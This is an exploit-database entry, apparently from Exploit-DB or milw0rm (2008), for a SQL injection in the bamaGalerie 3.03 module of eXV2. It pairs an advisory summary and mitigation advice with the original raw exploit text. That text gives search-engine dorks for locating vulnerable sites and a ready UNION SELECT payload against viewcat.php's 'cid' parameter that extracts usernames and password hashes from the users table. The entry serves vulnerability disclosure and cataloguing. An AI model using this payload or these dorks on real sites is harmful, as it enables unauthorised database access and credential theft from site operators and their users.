eXV2 Module bamaGalerie 3.03 SQL Injection

vendor:

bamaGalerie

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: bamaGalerie

Affected Version From: 03.03

Affected Version To: 03.03

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

eXV2 Module bamaGalerie 3.03 SQL Injection

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'cid' parameter to 'viewcat.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. Successful exploitation of this vulnerability may allow an attacker to gain access to sensitive information, modify data, or exploit vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also use stored procedures and parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

##########################################
#
# eXV2 Module bamaGalerie 3.03 SQL Injection
#
# download=http://www.exv2-filecenter.de/modules/mydownloads/singlefile.php?lid=9
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORKS 1 : allinurl :"modules/bamagalerie3"
# DORKS 2 : allinurl :"modules/bamagalerie"
#
###########################################
EXPLOIT :

viewcat.php?cid=-9999999/**/union/**/select/**/0,1,2,3,concat(uname,0x3a,pass),5,6/**/from/**/e_xoops_users/*

###########################################
##################S@BUN####################
###########################################
#####hackturkiye.hackturkiye@gmail.com#####
###########################################

# milw0rm.com [2008-03-12]